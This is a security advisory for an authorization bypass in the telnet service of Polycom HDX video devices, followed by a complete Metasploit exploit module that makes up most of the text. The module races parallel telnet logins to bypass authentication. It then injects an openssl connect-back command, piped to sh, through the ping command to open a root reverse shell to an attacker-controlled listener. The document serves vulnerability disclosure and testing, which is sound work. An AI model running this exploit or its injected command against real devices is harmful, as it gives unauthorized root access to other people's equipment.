Polycom HDX Telnet Authorization Bypass Vulnerability



EKU-ID: 3021 CVE: OSVDB-ID:
Author: Paul Haas Published: 2013-02-18 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home


========================================================================
= Polycom HDX Telnet Authorization Bypass
=
= Vendor Website:
=    www.polycom.com
=
= Affected Version:
=   Polycom HDX devices:
=     All releases prior to and including Commercial 3.0.5
=
= Public disclosure on January 18, 2013
=
========================================================================

== Overview ==

The Polycom HDX is a series of telecommunication and video devices. The
telnet component of Polycom HDX video endpoint devices is vulnerable to
an authorization bypass when multiple simultaneous connections are
repeatedly made to the service, allowing remote network attackers to
gain full access to a Polycom command prompt without authentication. 
Versions prior to 3.0.4 also contain OS command injection in the ping
command which can be used to escape the telnet prompt and execute
arbitrary commands as root.
 
== Solution ==

Until a software solution is released, Polycom recommends administrators
disable telnet on their HDX unit.
 
== Credit ==

Discovered and advised to Polycom Inc., 2012 by Paul Haas of
Security-Assessment.com.

== About Security-Assessment.com ==

Security-Assessment.com is a leading team of Information Security
consultants specializing in providing high quality Information Security
services to clients throughout the Asia Pacific region. Our clients
include some of the largest globally recognized companies in areas such
as finance, telecommunications, broadcasting, legal and government. Our
aim is to provide the very best independent advice and a high level of
technical expertise while creating long and lasting professional
relationships with our clients.

Web: www.security-assessment.com 
Email: info@security-assessment.com

== Exploitation ==

The following Metasploit module can be used to reproduce the issue:

cat > psh_auth_bypass.rb <<EOF
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
#   http://metasploit.com/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
    Rank = NormalRanking
    include Msf::Exploit::Remote::Tcp
    include Msf::Auxiliary::Report

    def initialize(info = {})
        super(update_info(info,
            'Name'            => 'Polycom Command Shell Authorization
Bypass',
            'Alias'            => 'psh_auth_bypass',
            'Author'        => [ 'Paul Haas <Paul [dot] Haas [at]
Security-Assessment.com>' ],
            'DisclosureDate'    => 'Jan 18 2013',
            'Description'    => %q{
                The login component of the Polycom Command Shell on
Polycom HDX
                Video End Points running software versions 3.0.5 and earlier
                is vulnerable to an authorization bypass when simultaneous
                connections are made to the service, allowing remote network
                attackers to gain access to a sandboxed telnet prompt
without
                authentication. Versions prior to 3.0.4 contain OS command
                injection in the ping command which can be used to execute
                arbitrary commands as root.
            },
            'License'        => MSF_LICENSE,
            'References'    =>
                [
                    [ 'URL',
'http://www.security-assessment.com/files/documents/advisory/Polycom%20HDX%20Telnet%20Authorization%20Bypass%20-%20RELEASE.pdf'
],
                    [ 'URL',
'http://blog.tempest.com.br/joao-paulo-campello/polycom-web-management-interface-os-command-injection.html'
]
                ],
            'Platform'        => 'unix',
            'Arch'            => ARCH_CMD,
            'Privileged'    => true,
            'Targets'        => [ [ "Universal", {} ] ],
            'Payload'        =>
            {
                'Space'        => 8000,
                'DisableNops'    => true,
                'Compat'    => { 'PayloadType'        => 'cmd',},
            },
            'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse_openssl' },
            'DefaultTarget' => 0
        ))

        register_options(
            [
                Opt::RHOST(),
                Opt::RPORT(23),
                OptAddress.new('CBHOST', [ false, "The listener address
used for staging the final payload" ]),
                OptPort.new('CBPORT', [ false, "The listener port used
for staging the final payload" ])
            ],self.class)
        register_advanced_options(
            [
                OptInt.new('THREADS', [false, 'Threads for
authentication bypass', 6]),
                OptInt.new('MAX_CONNECTIONS', [false, 'Threads for
authentication bypass', 100])
            ], self.class)
    end

    def check
        connect
        sock.put(Rex::Text.rand_text_alpha(rand(5)+1) + "\n")
        ::IO.select(nil, nil, nil, 1)
        res = sock.get
        disconnect

        if !(res and res.length > 0)
            return Exploit::CheckCode::Safe
        end

        if (res =~ /Welcome to ViewStation/)
            return Exploit::CheckCode::Appears
        end

        return Exploit::CheckCode::Safe
    end

    def exploit
        # Keep track of results (successful connections)
        results = []

        # Random string for password
        password = Rex::Text.rand_text_alpha(rand(5)+1)

        # Threaded login checker
        max_threads = datastore['THREADS']
        cur_threads = []

        # Try up to 100 times just to be sure
        queue = [*(1 .. datastore['MAX_CONNECTIONS'])]

        print_status("Starting Authentication bypass with
#{datastore['THREADS']} threads with #{datastore['MAX_CONNECTIONS']} max
connections ")
        while(queue.length > 0)
            while(cur_threads.length < max_threads)

                # We can stop if we get a valid login
                break if results.length > 0

                # keep track of how many attempts we've made
                item = queue.shift

                # We can stop if we reach max tries
                break if not item

                t = Thread.new(item) do |count|
                        sock = connect
                        sock.put(password + "\n")
                        res = sock.get

                        while res.length > 0
                            break if results.length > 0

                            # Post-login Polycom banner means success
                            if (res =~ /Polycom/)
                                results << sock
                                break
                            # bind error indicates bypass is working
                            elsif (res =~ /bind/)
                                sock.put(password + "\n")
                            #Login error means we need to disconnect
                            elsif (res =~ /failed/)
                                break
                            #To many connections means we need to disconnect
                            elsif (res =~ /Error/)
                                break
                            end
                            res = sock.get
                        end
                end

                cur_threads << t
            end

            # We can stop if we get a valid login
            break if results.length > 0

            # Add to a list of dead threads if we're finished
            cur_threads.each_index do |ti|
                t = cur_threads[ti]
                if not t.alive?
                    cur_threads[ti] = nil
                end
            end

            # Remove any dead threads from the set
            cur_threads.delete(nil)

            ::IO.select(nil, nil, nil, 0.25)
        end

        # Clean up any remaining threads
        cur_threads.each {|sock| sock.kill }

        if results.length > 0
            print_good("#{rhost}:#{rport} Successfully exploited the
authentication bypass flaw")
            do_payload(results[0])
        else
            print_error("#{rhost}:#{rport} Unable to bypass
authentication, this target may not be vulnerable")
        end

    end

    def do_payload(sock)
        # Prefer CBHOST, but use LHOST, or autodetect the IP otherwise
        cbhost = datastore['CBHOST'] || datastore['LHOST'] ||
Rex::Socket.source_address(datastore['RHOST'])

        # Start a listener
        start_listener(true)

        # Figure out the port we picked
        cbport = self.service.getsockname[2]

        # Utilize ping OS injection to push cmd payload using stager
optimized for limited buffer < 128
        cmd = "\nping
;s=$IFS;openssl${s}s_client$s-quiet$s-host${s}#{cbhost}$s-port${s}#{cbport}|sh;ping$s-c${s}1${s}0\n"
        sock.put(cmd)

        # Give time for our command to be queued and executed
        1.upto(5) do
            ::IO.select(nil, nil, nil, 1)
            break if session_created?
        end
    end

    def stage_final_payload(cli)
        print_good("Sending payload of #{payload.encoded.length} bytes
to #{cli.peerhost}:#{cli.peerport}...")
        cli.put(payload.encoded + "\n")
    end

    def start_listener(ssl = false)
        comm = datastore['ListenerComm']
        if comm == "local"
            comm = ::Rex::Socket::Comm::Local
        else
            comm = nil
        end

        self.service = Rex::Socket::TcpServer.create(
            'LocalPort' => datastore['CBPORT'],
            'SSL' => ssl,
            'SSLCert' => datastore['SSLCert'],
            'Comm' => comm,
            'Context' =>
                {
                'Msf' => framework,
                'MsfExploit' => self,
                })

        self.service.on_client_connect_proc = Proc.new { |client|
        stage_final_payload(client)
        }

        # Start the listening service
        self.service.start
    end

    # Shut down any running services
    def cleanup
        super
        if self.service
            print_status("Shutting down payload stager listener...")
            begin
                self.service.deref if self.service.kind_of?(Rex::Service)
                if self.service.kind_of?(Rex::Socket)
                    self.service.close
                    self.service.stop
                end
                self.service = nil
            rescue ::Exception
            end
        end
    end

    # Accessor for our TCP payload stager
    attr_accessor :service

end

EOF